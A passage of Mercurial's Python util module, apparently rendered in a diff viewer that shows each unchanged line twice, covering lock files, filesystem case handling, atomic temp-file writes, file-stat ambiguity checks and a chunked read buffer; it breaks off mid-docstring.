1728 return os.symlink(info, pathname)
1729 except OSError as why:
1729 except OSError as why:
1730 if why.errno == errno.EEXIST:
1730 if why.errno == errno.EEXIST:
1731 raise
1731 raise
1732 except AttributeError: # no symlink in os
1732 except AttributeError: # no symlink in os
1733 pass
1733 pass
1734
1734
1735 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1735 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1736 ld = os.open(pathname, flags)
1736 ld = os.open(pathname, flags)
1737 os.write(ld, info)
1737 os.write(ld, info)
1738 os.close(ld)
1738 os.close(ld)
1739
1739
1740 def readlock(pathname):
1740 def readlock(pathname):
1741 try:
1741 try:
1742 return os.readlink(pathname)
1742 return os.readlink(pathname)
1743 except OSError as why:
1743 except OSError as why:
1744 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1744 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1745 raise
1745 raise
1746 except AttributeError: # no symlink in os
1746 except AttributeError: # no symlink in os
1747 pass
1747 pass
1748 fp = posixfile(pathname, 'rb')
1748 fp = posixfile(pathname, 'rb')
1749 r = fp.read()
1749 r = fp.read()
1750 fp.close()
1750 fp.close()
1751 return r
1751 return r
1752
1752
1753 def fstat(fp):
1753 def fstat(fp):
1754 '''stat file object that may not have fileno method.'''
1754 '''stat file object that may not have fileno method.'''
1755 try:
1755 try:
1756 return os.fstat(fp.fileno())
1756 return os.fstat(fp.fileno())
1757 except AttributeError:
1757 except AttributeError:
1758 return os.stat(fp.name)
1758 return os.stat(fp.name)
1759
1759
1760 # File system features
1760 # File system features
1761
1761
1762 def fscasesensitive(path):
1762 def fscasesensitive(path):
1763 """
1763 """
1764 Return true if the given path is on a case-sensitive filesystem
1764 Return true if the given path is on a case-sensitive filesystem
1765
1765
1766 Requires a path (like /foo/.hg) ending with a foldable final
1766 Requires a path (like /foo/.hg) ending with a foldable final
1767 directory component.
1767 directory component.
1768 """
1768 """
1769 s1 = os.lstat(path)
1769 s1 = os.lstat(path)
1770 d, b = os.path.split(path)
1770 d, b = os.path.split(path)
1771 b2 = b.upper()
1771 b2 = b.upper()
1772 if b == b2:
1772 if b == b2:
1773 b2 = b.lower()
1773 b2 = b.lower()
1774 if b == b2:
1774 if b == b2:
1775 return True # no evidence against case sensitivity
1775 return True # no evidence against case sensitivity
1776 p2 = os.path.join(d, b2)
1776 p2 = os.path.join(d, b2)
1777 try:
1777 try:
1778 s2 = os.lstat(p2)
1778 s2 = os.lstat(p2)
1779 if s2 == s1:
1779 if s2 == s1:
1780 return False
1780 return False
1781 return True
1781 return True
1782 except OSError:
1782 except OSError:
1783 return True
1783 return True
1784
1784
1785 try:
1785 try:
1786 import re2
1786 import re2
1787 _re2 = None
1787 _re2 = None
1788 except ImportError:
1788 except ImportError:
1789 _re2 = False
1789 _re2 = False
1790
1790
1791 class _re(object):
1791 class _re(object):
1792 def _checkre2(self):
1792 def _checkre2(self):
1793 global _re2
1793 global _re2
1794 try:
1794 try:
1795 # check if match works, see issue3964
1795 # check if match works, see issue3964
1796 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1796 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1797 except ImportError:
1797 except ImportError:
1798 _re2 = False
1798 _re2 = False
1799
1799
1800 def compile(self, pat, flags=0):
1800 def compile(self, pat, flags=0):
1801 '''Compile a regular expression, using re2 if possible
1801 '''Compile a regular expression, using re2 if possible
1802
1802
1803 For best performance, use only re2-compatible regexp features. The
1803 For best performance, use only re2-compatible regexp features. The
1804 only flags from the re module that are re2-compatible are
1804 only flags from the re module that are re2-compatible are
1805 IGNORECASE and MULTILINE.'''
1805 IGNORECASE and MULTILINE.'''
1806 if _re2 is None:
1806 if _re2 is None:
1807 self._checkre2()
1807 self._checkre2()
1808 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1808 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1809 if flags & remod.IGNORECASE:
1809 if flags & remod.IGNORECASE:
1810 pat = '(?i)' + pat
1810 pat = '(?i)' + pat
1811 if flags & remod.MULTILINE:
1811 if flags & remod.MULTILINE:
1812 pat = '(?m)' + pat
1812 pat = '(?m)' + pat
1813 try:
1813 try:
1814 return re2.compile(pat)
1814 return re2.compile(pat)
1815 except re2.error:
1815 except re2.error:
1816 pass
1816 pass
1817 return remod.compile(pat, flags)
1817 return remod.compile(pat, flags)
1818
1818
1819 @propertycache
1819 @propertycache
1820 def escape(self):
1820 def escape(self):
1821 '''Return the version of escape corresponding to self.compile.
1821 '''Return the version of escape corresponding to self.compile.
1822
1822
1823 This is imperfect because whether re2 or re is used for a particular
1823 This is imperfect because whether re2 or re is used for a particular
1824 function depends on the flags, etc, but it's the best we can do.
1824 function depends on the flags, etc, but it's the best we can do.
1825 '''
1825 '''
1826 global _re2
1826 global _re2
1827 if _re2 is None:
1827 if _re2 is None:
1828 self._checkre2()
1828 self._checkre2()
1829 if _re2:
1829 if _re2:
1830 return re2.escape
1830 return re2.escape
1831 else:
1831 else:
1832 return remod.escape
1832 return remod.escape
1833
1833
1834 re = _re()
1834 re = _re()
1835
1835
1836 _fspathcache = {}
1836 _fspathcache = {}
1837 def fspath(name, root):
1837 def fspath(name, root):
1838 '''Get name in the case stored in the filesystem
1838 '''Get name in the case stored in the filesystem
1839
1839
1840 The name should be relative to root, and be normcase-ed for efficiency.
1840 The name should be relative to root, and be normcase-ed for efficiency.
1841
1841
1842 Note that this function is unnecessary, and should not be
1842 Note that this function is unnecessary, and should not be
1843 called, for case-sensitive filesystems (simply because it's expensive).
1843 called, for case-sensitive filesystems (simply because it's expensive).
1844
1844
1845 The root should be normcase-ed, too.
1845 The root should be normcase-ed, too.
1846 '''
1846 '''
1847 def _makefspathcacheentry(dir):
1847 def _makefspathcacheentry(dir):
1848 return dict((normcase(n), n) for n in os.listdir(dir))
1848 return dict((normcase(n), n) for n in os.listdir(dir))
1849
1849
1850 seps = pycompat.ossep
1850 seps = pycompat.ossep
1851 if pycompat.osaltsep:
1851 if pycompat.osaltsep:
1852 seps = seps + pycompat.osaltsep
1852 seps = seps + pycompat.osaltsep
1853 # Protect backslashes. This gets silly very quickly.
1853 # Protect backslashes. This gets silly very quickly.
1854 seps.replace('\\','\\\\')
1854 seps.replace('\\','\\\\')
1855 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1855 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1856 dir = os.path.normpath(root)
1856 dir = os.path.normpath(root)
1857 result = []
1857 result = []
1858 for part, sep in pattern.findall(name):
1858 for part, sep in pattern.findall(name):
1859 if sep:
1859 if sep:
1860 result.append(sep)
1860 result.append(sep)
1861 continue
1861 continue
1862
1862
1863 if dir not in _fspathcache:
1863 if dir not in _fspathcache:
1864 _fspathcache[dir] = _makefspathcacheentry(dir)
1864 _fspathcache[dir] = _makefspathcacheentry(dir)
1865 contents = _fspathcache[dir]
1865 contents = _fspathcache[dir]
1866
1866
1867 found = contents.get(part)
1867 found = contents.get(part)
1868 if not found:
1868 if not found:
1869 # retry "once per directory" per "dirstate.walk" which
1869 # retry "once per directory" per "dirstate.walk" which
1870 # may take place for each patches of "hg qpush", for example
1870 # may take place for each patches of "hg qpush", for example
1871 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1871 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1872 found = contents.get(part)
1872 found = contents.get(part)
1873
1873
1874 result.append(found or part)
1874 result.append(found or part)
1875 dir = os.path.join(dir, part)
1875 dir = os.path.join(dir, part)
1876
1876
1877 return ''.join(result)
1877 return ''.join(result)
1878
1878
1879 def checknlink(testfile):
1879 def checknlink(testfile):
1880 '''check whether hardlink count reporting works properly'''
1880 '''check whether hardlink count reporting works properly'''
1881
1881
1882 # testfile may be open, so we need a separate file for checking to
1882 # testfile may be open, so we need a separate file for checking to
1883 # work around issue2543 (or testfile may get lost on Samba shares)
1883 # work around issue2543 (or testfile may get lost on Samba shares)
1884 f1, f2, fp = None, None, None
1884 f1, f2, fp = None, None, None
1885 try:
1885 try:
1886 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1886 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1887 suffix='1~', dir=os.path.dirname(testfile))
1887 suffix='1~', dir=os.path.dirname(testfile))
1888 os.close(fd)
1888 os.close(fd)
1889 f2 = '%s2~' % f1[:-2]
1889 f2 = '%s2~' % f1[:-2]
1890
1890
1891 oslink(f1, f2)
1891 oslink(f1, f2)
1892 # nlinks() may behave differently for files on Windows shares if
1892 # nlinks() may behave differently for files on Windows shares if
1893 # the file is open.
1893 # the file is open.
1894 fp = posixfile(f2)
1894 fp = posixfile(f2)
1895 return nlinks(f2) > 1
1895 return nlinks(f2) > 1
1896 except OSError:
1896 except OSError:
1897 return False
1897 return False
1898 finally:
1898 finally:
1899 if fp is not None:
1899 if fp is not None:
1900 fp.close()
1900 fp.close()
1901 for f in (f1, f2):
1901 for f in (f1, f2):
1902 try:
1902 try:
1903 if f is not None:
1903 if f is not None:
1904 os.unlink(f)
1904 os.unlink(f)
1905 except OSError:
1905 except OSError:
1906 pass
1906 pass
1907
1907
1908 def endswithsep(path):
1908 def endswithsep(path):
1909 '''Check path ends with os.sep or os.altsep.'''
1909 '''Check path ends with os.sep or os.altsep.'''
1910 return (path.endswith(pycompat.ossep)
1910 return (path.endswith(pycompat.ossep)
1911 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1911 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1912
1912
1913 def splitpath(path):
1913 def splitpath(path):
1914 '''Split path by os.sep.
1914 '''Split path by os.sep.
1915 Note that this function does not use os.altsep because this is
1915 Note that this function does not use os.altsep because this is
1916 an alternative of simple "xxx.split(os.sep)".
1916 an alternative of simple "xxx.split(os.sep)".
1917 It is recommended to use os.path.normpath() before using this
1917 It is recommended to use os.path.normpath() before using this
1918 function if need.'''
1918 function if need.'''
1919 return path.split(pycompat.ossep)
1919 return path.split(pycompat.ossep)
1920
1920
1921 def mktempcopy(name, emptyok=False, createmode=None):
1921 def mktempcopy(name, emptyok=False, createmode=None):
1922 """Create a temporary file with the same contents from name
1922 """Create a temporary file with the same contents from name
1923
1923
1924 The permission bits are copied from the original file.
1924 The permission bits are copied from the original file.
1925
1925
1926 If the temporary file is going to be truncated immediately, you
1926 If the temporary file is going to be truncated immediately, you
1927 can use emptyok=True as an optimization.
1927 can use emptyok=True as an optimization.
1928
1928
1929 Returns the name of the temporary file.
1929 Returns the name of the temporary file.
1930 """
1930 """
1931 d, fn = os.path.split(name)
1931 d, fn = os.path.split(name)
1932 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1932 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1933 os.close(fd)
1933 os.close(fd)
1934 # Temporary files are created with mode 0600, which is usually not
1934 # Temporary files are created with mode 0600, which is usually not
1935 # what we want. If the original file already exists, just copy
1935 # what we want. If the original file already exists, just copy
1936 # its mode. Otherwise, manually obey umask.
1936 # its mode. Otherwise, manually obey umask.
1937 copymode(name, temp, createmode)
1937 copymode(name, temp, createmode)
1938 if emptyok:
1938 if emptyok:
1939 return temp
1939 return temp
1940 try:
1940 try:
1941 try:
1941 try:
1942 ifp = posixfile(name, "rb")
1942 ifp = posixfile(name, "rb")
1943 except IOError as inst:
1943 except IOError as inst:
1944 if inst.errno == errno.ENOENT:
1944 if inst.errno == errno.ENOENT:
1945 return temp
1945 return temp
1946 if not getattr(inst, 'filename', None):
1946 if not getattr(inst, 'filename', None):
1947 inst.filename = name
1947 inst.filename = name
1948 raise
1948 raise
1949 ofp = posixfile(temp, "wb")
1949 ofp = posixfile(temp, "wb")
1950 for chunk in filechunkiter(ifp):
1950 for chunk in filechunkiter(ifp):
1951 ofp.write(chunk)
1951 ofp.write(chunk)
1952 ifp.close()
1952 ifp.close()
1953 ofp.close()
1953 ofp.close()
1954 except: # re-raises
1954 except: # re-raises
1955 try:
1955 try:
1956 os.unlink(temp)
1956 os.unlink(temp)
1957 except OSError:
1957 except OSError:
1958 pass
1958 pass
1959 raise
1959 raise
1960 return temp
1960 return temp
1961
1961
1962 class filestat(object):
1962 class filestat(object):
1963 """help to exactly detect change of a file
1963 """help to exactly detect change of a file
1964
1964
1965 'stat' attribute is result of 'os.stat()' if specified 'path'
1965 'stat' attribute is result of 'os.stat()' if specified 'path'
1966 exists. Otherwise, it is None. This can avoid preparative
1966 exists. Otherwise, it is None. This can avoid preparative
1967 'exists()' examination on client side of this class.
1967 'exists()' examination on client side of this class.
1968 """
1968 """
1969 def __init__(self, stat):
1969 def __init__(self, stat):
1970 self.stat = stat
1970 self.stat = stat
1971
1971
1972 @classmethod
1972 @classmethod
1973 def frompath(cls, path):
1973 def frompath(cls, path):
1974 try:
1974 try:
1975 stat = os.stat(path)
1975 stat = os.stat(path)
1976 except OSError as err:
1976 except OSError as err:
1977 if err.errno != errno.ENOENT:
1977 if err.errno != errno.ENOENT:
1978 raise
1978 raise
1979 stat = None
1979 stat = None
1980 return cls(stat)
1980 return cls(stat)
1981
1981
1982 @classmethod
1982 @classmethod
1983 def fromfp(cls, fp):
1983 def fromfp(cls, fp):
1984 stat = os.fstat(fp.fileno())
1984 stat = os.fstat(fp.fileno())
1985 return cls(stat)
1985 return cls(stat)
1986
1986
1987 __hash__ = object.__hash__
1987 __hash__ = object.__hash__
1988
1988
1989 def __eq__(self, old):
1989 def __eq__(self, old):
1990 try:
1990 try:
1991 # if ambiguity between stat of new and old file is
1991 # if ambiguity between stat of new and old file is
1992 # avoided, comparison of size, ctime and mtime is enough
1992 # avoided, comparison of size, ctime and mtime is enough
1993 # to exactly detect change of a file regardless of platform
1993 # to exactly detect change of a file regardless of platform
1994 return (self.stat.st_size == old.stat.st_size and
1994 return (self.stat.st_size == old.stat.st_size and
1995 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1995 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1996 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1996 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1997 except AttributeError:
1997 except AttributeError:
1998 pass
1998 pass
1999 try:
1999 try:
2000 return self.stat is None and old.stat is None
2000 return self.stat is None and old.stat is None
2001 except AttributeError:
2001 except AttributeError:
2002 return False
2002 return False
2003
2003
2004 def isambig(self, old):
2004 def isambig(self, old):
2005 """Examine whether new (= self) stat is ambiguous against old one
2005 """Examine whether new (= self) stat is ambiguous against old one
2006
2006
2007 "S[N]" below means stat of a file at N-th change:
2007 "S[N]" below means stat of a file at N-th change:
2008
2008
2009 - S[n-1].ctime < S[n].ctime: can detect change of a file
2009 - S[n-1].ctime < S[n].ctime: can detect change of a file
2010 - S[n-1].ctime == S[n].ctime
2010 - S[n-1].ctime == S[n].ctime
2011 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2011 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2012 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2012 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2013 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2013 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2014 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2014 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2015
2015
2016 Case (*2) above means that a file was changed twice or more at
2016 Case (*2) above means that a file was changed twice or more at
2017 same time in sec (= S[n-1].ctime), and comparison of timestamp
2017 same time in sec (= S[n-1].ctime), and comparison of timestamp
2018 is ambiguous.
2018 is ambiguous.
2019
2019
2020 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2020 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2021 timestamp is ambiguous".
2021 timestamp is ambiguous".
2022
2022
2023 But advancing mtime only in case (*2) doesn't work as
2023 But advancing mtime only in case (*2) doesn't work as
2024 expected, because naturally advanced S[n].mtime in case (*1)
2024 expected, because naturally advanced S[n].mtime in case (*1)
2025 might be equal to manually advanced S[n-1 or earlier].mtime.
2025 might be equal to manually advanced S[n-1 or earlier].mtime.
2026
2026
2027 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2027 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2028 treated as ambiguous regardless of mtime, to avoid overlooking
2028 treated as ambiguous regardless of mtime, to avoid overlooking
2029 by confliction between such mtime.
2029 by confliction between such mtime.
2030
2030
2031 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2031 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2032 S[n].mtime", even if size of a file isn't changed.
2032 S[n].mtime", even if size of a file isn't changed.
2033 """
2033 """
2034 try:
2034 try:
2035 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2035 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2036 except AttributeError:
2036 except AttributeError:
2037 return False
2037 return False
2038
2038
2039 def avoidambig(self, path, old):
2039 def avoidambig(self, path, old):
2040 """Change file stat of specified path to avoid ambiguity
2040 """Change file stat of specified path to avoid ambiguity
2041
2041
2042 'old' should be previous filestat of 'path'.
2042 'old' should be previous filestat of 'path'.
2043
2043
2044 This skips avoiding ambiguity, if a process doesn't have
2044 This skips avoiding ambiguity, if a process doesn't have
2045 appropriate privileges for 'path'. This returns False in this
2045 appropriate privileges for 'path'. This returns False in this
2046 case.
2046 case.
2047
2047
2048 Otherwise, this returns True, as "ambiguity is avoided".
2048 Otherwise, this returns True, as "ambiguity is avoided".
2049 """
2049 """
2050 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2050 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2051 try:
2051 try:
2052 os.utime(path, (advanced, advanced))
2052 os.utime(path, (advanced, advanced))
2053 except OSError as inst:
2053 except OSError as inst:
2054 if inst.errno == errno.EPERM:
2054 if inst.errno == errno.EPERM:
2055 # utime() on the file created by another user causes EPERM,
2055 # utime() on the file created by another user causes EPERM,
2056 # if a process doesn't have appropriate privileges
2056 # if a process doesn't have appropriate privileges
2057 return False
2057 return False
2058 raise
2058 raise
2059 return True
2059 return True
2060
2060
2061 def __ne__(self, other):
2061 def __ne__(self, other):
2062 return not self == other
2062 return not self == other
2063
2063
2064 class atomictempfile(object):
2064 class atomictempfile(object):
2065 '''writable file object that atomically updates a file
2065 '''writable file object that atomically updates a file
2066
2066
2067 All writes will go to a temporary copy of the original file. Call
2067 All writes will go to a temporary copy of the original file. Call
2068 close() when you are done writing, and atomictempfile will rename
2068 close() when you are done writing, and atomictempfile will rename
2069 the temporary copy to the original name, making the changes
2069 the temporary copy to the original name, making the changes
2070 visible. If the object is destroyed without being closed, all your
2070 visible. If the object is destroyed without being closed, all your
2071 writes are discarded.
2071 writes are discarded.
2072
2072
2073 checkambig argument of constructor is used with filestat, and is
2073 checkambig argument of constructor is used with filestat, and is
2074 useful only if target file is guarded by any lock (e.g. repo.lock
2074 useful only if target file is guarded by any lock (e.g. repo.lock
2075 or repo.wlock).
2075 or repo.wlock).
2076 '''
2076 '''
2077 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2077 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2078 self.__name = name # permanent name
2078 self.__name = name # permanent name
2079 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2079 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2080 createmode=createmode)
2080 createmode=createmode)
2081 self._fp = posixfile(self._tempname, mode)
2081 self._fp = posixfile(self._tempname, mode)
2082 self._checkambig = checkambig
2082 self._checkambig = checkambig
2083
2083
2084 # delegated methods
2084 # delegated methods
2085 self.read = self._fp.read
2085 self.read = self._fp.read
2086 self.write = self._fp.write
2086 self.write = self._fp.write
2087 self.seek = self._fp.seek
2087 self.seek = self._fp.seek
2088 self.tell = self._fp.tell
2088 self.tell = self._fp.tell
2089 self.fileno = self._fp.fileno
2089 self.fileno = self._fp.fileno
2090
2090
2091 def close(self):
2091 def close(self):
2092 if not self._fp.closed:
2092 if not self._fp.closed:
2093 self._fp.close()
2093 self._fp.close()
2094 filename = localpath(self.__name)
2094 filename = localpath(self.__name)
2095 oldstat = self._checkambig and filestat.frompath(filename)
2095 oldstat = self._checkambig and filestat.frompath(filename)
2096 if oldstat and oldstat.stat:
2096 if oldstat and oldstat.stat:
2097 rename(self._tempname, filename)
2097 rename(self._tempname, filename)
2098 newstat = filestat.frompath(filename)
2098 newstat = filestat.frompath(filename)
2099 if newstat.isambig(oldstat):
2099 if newstat.isambig(oldstat):
2100 # stat of changed file is ambiguous to original one
2100 # stat of changed file is ambiguous to original one
2101 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2101 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2102 os.utime(filename, (advanced, advanced))
2102 os.utime(filename, (advanced, advanced))
2103 else:
2103 else:
2104 rename(self._tempname, filename)
2104 rename(self._tempname, filename)
2105
2105
2106 def discard(self):
2106 def discard(self):
2107 if not self._fp.closed:
2107 if not self._fp.closed:
2108 try:
2108 try:
2109 os.unlink(self._tempname)
2109 os.unlink(self._tempname)
2110 except OSError:
2110 except OSError:
2111 pass
2111 pass
2112 self._fp.close()
2112 self._fp.close()
2113
2113
2114 def __del__(self):
2114 def __del__(self):
2115 if safehasattr(self, '_fp'): # constructor actually did something
2115 if safehasattr(self, '_fp'): # constructor actually did something
2116 self.discard()
2116 self.discard()
2117
2117
2118 def __enter__(self):
2118 def __enter__(self):
2119 return self
2119 return self
2120
2120
2121 def __exit__(self, exctype, excvalue, traceback):
2121 def __exit__(self, exctype, excvalue, traceback):
2122 if exctype is not None:
2122 if exctype is not None:
2123 self.discard()
2123 self.discard()
2124 else:
2124 else:
2125 self.close()
2125 self.close()
2126
2126
2127 def unlinkpath(f, ignoremissing=False):
2127 def unlinkpath(f, ignoremissing=False):
2128 """unlink and remove the directory if it is empty"""
2128 """unlink and remove the directory if it is empty"""
2129 if ignoremissing:
2129 if ignoremissing:
2130 tryunlink(f)
2130 tryunlink(f)
2131 else:
2131 else:
2132 unlink(f)
2132 unlink(f)
2133 # try removing directories that might now be empty
2133 # try removing directories that might now be empty
2134 try:
2134 try:
2135 removedirs(os.path.dirname(f))
2135 removedirs(os.path.dirname(f))
2136 except OSError:
2136 except OSError:
2137 pass
2137 pass
2138
2138
2139 def tryunlink(f):
2139 def tryunlink(f):
2140 """Attempt to remove a file, ignoring ENOENT errors."""
2140 """Attempt to remove a file, ignoring ENOENT errors."""
2141 try:
2141 try:
2142 unlink(f)
2142 unlink(f)
2143 except OSError as e:
2143 except OSError as e:
2144 if e.errno != errno.ENOENT:
2144 if e.errno != errno.ENOENT:
2145 raise
2145 raise
2146
2146
2147 def makedirs(name, mode=None, notindexed=False):
2147 def makedirs(name, mode=None, notindexed=False):
2148 """recursive directory creation with parent mode inheritance
2148 """recursive directory creation with parent mode inheritance
2149
2149
2150 Newly created directories are marked as "not to be indexed by
2150 Newly created directories are marked as "not to be indexed by
2151 the content indexing service", if ``notindexed`` is specified
2151 the content indexing service", if ``notindexed`` is specified
2152 for "write" mode access.
2152 for "write" mode access.
2153 """
2153 """
2154 try:
2154 try:
2155 makedir(name, notindexed)
2155 makedir(name, notindexed)
2156 except OSError as err:
2156 except OSError as err:
2157 if err.errno == errno.EEXIST:
2157 if err.errno == errno.EEXIST:
2158 return
2158 return
2159 if err.errno != errno.ENOENT or not name:
2159 if err.errno != errno.ENOENT or not name:
2160 raise
2160 raise
2161 parent = os.path.dirname(os.path.abspath(name))
2161 parent = os.path.dirname(os.path.abspath(name))
2162 if parent == name:
2162 if parent == name:
2163 raise
2163 raise
2164 makedirs(parent, mode, notindexed)
2164 makedirs(parent, mode, notindexed)
2165 try:
2165 try:
2166 makedir(name, notindexed)
2166 makedir(name, notindexed)
2167 except OSError as err:
2167 except OSError as err:
2168 # Catch EEXIST to handle races
2168 # Catch EEXIST to handle races
2169 if err.errno == errno.EEXIST:
2169 if err.errno == errno.EEXIST:
2170 return
2170 return
2171 raise
2171 raise
2172 if mode is not None:
2172 if mode is not None:
2173 os.chmod(name, mode)
2173 os.chmod(name, mode)
2174
2174
2175 def readfile(path):
2175 def readfile(path):
2176 with open(path, 'rb') as fp:
2176 with open(path, 'rb') as fp:
2177 return fp.read()
2177 return fp.read()
2178
2178
2179 def writefile(path, text):
2179 def writefile(path, text):
2180 with open(path, 'wb') as fp:
2180 with open(path, 'wb') as fp:
2181 fp.write(text)
2181 fp.write(text)
2182
2182
2183 def appendfile(path, text):
2183 def appendfile(path, text):
2184 with open(path, 'ab') as fp:
2184 with open(path, 'ab') as fp:
2185 fp.write(text)
2185 fp.write(text)
2186
2186
2187 class chunkbuffer(object):
2187 class chunkbuffer(object):
2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2189 iterator over chunks of arbitrary size."""
2189 iterator over chunks of arbitrary size."""
2190
2190
2191 def __init__(self, in_iter):
2191 def __init__(self, in_iter):
2192 """in_iter is the iterator that's iterating over the input chunks."""
2192 """in_iter is the iterator that's iterating over the input chunks."""
2193 def splitbig(chunks):
2193 def splitbig(chunks):
2194 for chunk in chunks:
2194 for chunk in chunks:
2195 if len(chunk) > 2**20:
2195 if len(chunk) > 2**20:
2196 pos = 0
2196 pos = 0
2197 while pos < len(chunk):
2197 while pos < len(chunk):
2198 end = pos + 2 ** 18
2198 end = pos + 2 ** 18
2199 yield chunk[pos:end]
2199 yield chunk[pos:end]
2200 pos = end
2200 pos = end
2201 else:
2201 else:
2202 yield chunk
2202 yield chunk
2203 self.iter = splitbig(in_iter)
2203 self.iter = splitbig(in_iter)
2204 self._queue = collections.deque()
2204 self._queue = collections.deque()
2205 self._chunkoffset = 0
2205 self._chunkoffset = 0
2206
2206
2207 def read(self, l=None):
2207 def read(self, l=None):
2208 """Read L bytes of data from the iterator of chunks of data.
2208 """Read L bytes of data from the iterator of chunks of data.
2209 Returns less than L bytes if the iterator runs dry.
2209 Returns less than L bytes if the iterator runs dry.
2210
2210
2211 If size parameter is omitted, read everything"""
2211 If size parameter is omitted, read everything"""
2212 if l is None:
2212 if l is None:
2213 return ''.join(self.iter)
2213 return ''.join(self.iter)
2214
2214
2215 left = l
2215 left = l
2216 buf = []
2216 buf = []
2217 queue = self._queue
2217 queue = self._queue
2218 while left > 0:
2218 while left > 0:
2219 # refill the queue
2219 # refill the queue
2220 if not queue:
2220 if not queue:
2221 target = 2**18
2221 target = 2**18
2222 for chunk in self.iter:
2222 for chunk in self.iter:
2223 queue.append(chunk)
2223 queue.append(chunk)
2224 target -= len(chunk)
2224 target -= len(chunk)
2225 if target <= 0:
2225 if target <= 0:
2226 break
2226 break
2227 if not queue:
2227 if not queue:
2228 break
2228 break
2229
2229
2230 # The easy way to do this would be to queue.popleft(), modify the
2230 # The easy way to do this would be to queue.popleft(), modify the
2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2232 # where we read partial chunk content, this incurs 2 dequeue
2232 # where we read partial chunk content, this incurs 2 dequeue
2233 # mutations and creates a new str for the remaining chunk in the
2233 # mutations and creates a new str for the remaining chunk in the
2234 # queue. Our code below avoids this overhead.
2234 # queue. Our code below avoids this overhead.
2235
2235
2236 chunk = queue[0]
2236 chunk = queue[0]
2237 chunkl = len(chunk)
2237 chunkl = len(chunk)
2238 offset = self._chunkoffset
2238 offset = self._chunkoffset
2239
2239
2240 # Use full chunk.
2240 # Use full chunk.
2241 if offset == 0 and left >= chunkl:
2241 if offset == 0 and left >= chunkl:
2242 left -= chunkl
2242 left -= chunkl
2243 queue.popleft()
2243 queue.popleft()
2244 buf.append(chunk)
2244 buf.append(chunk)
2245 # self._chunkoffset remains at 0.
2245 # self._chunkoffset remains at 0.
2246 continue
2246 continue
2247
2247
2248 chunkremaining = chunkl - offset
2248 chunkremaining = chunkl - offset
2249
2249
2250 # Use all of unconsumed part of chunk.
2250 # Use all of unconsumed part of chunk.
2251 if left >= chunkremaining:
2251 if left >= chunkremaining:
2252 left -= chunkremaining
2252 left -= chunkremaining
2253 queue.popleft()
2253 queue.popleft()
2254 # offset == 0 is enabled by block above, so this won't merely
2254 # offset == 0 is enabled by block above, so this won't merely
2255 # copy via ``chunk[0:]``.
2255 # copy via ``chunk[0:]``.
2256 buf.append(chunk[offset:])
2256 buf.append(chunk[offset:])
2257 self._chunkoffset = 0
2257 self._chunkoffset = 0
2258
2258
2259 # Partial chunk needed.
2259 # Partial chunk needed.
2260 else:
2260 else:
2261 buf.append(chunk[offset:offset + left])
2261 buf.append(chunk[offset:offset + left])
2262 self._chunkoffset += left
2262 self._chunkoffset += left
2263 left -= chunkremaining
2263 left -= chunkremaining
2264
2264
2265 return ''.join(buf)
2265 return ''.join(buf)
2266
2266
2267 def filechunkiter(f, size=131072, limit=None):
2267 def filechunkiter(f, size=131072, limit=None):
2268 """Create a generator that produces the data in the file size
2268 """Create a generator that produces the data in the file size
2269 (default 131072) bytes at a time, up to optional limit (default is
2269 (default 131072) bytes at a time, up to optional limit (default is
2270 to read all data). Chunks may be less than size bytes if the
2270 to read all data). Chunks may be less than size bytes if the
2271 chunk is the last chunk in the file, or the file is a socket or
2271 chunk is the last chunk in the file, or the file is a socket or
2272 some other type of file that sometimes reads less data than is
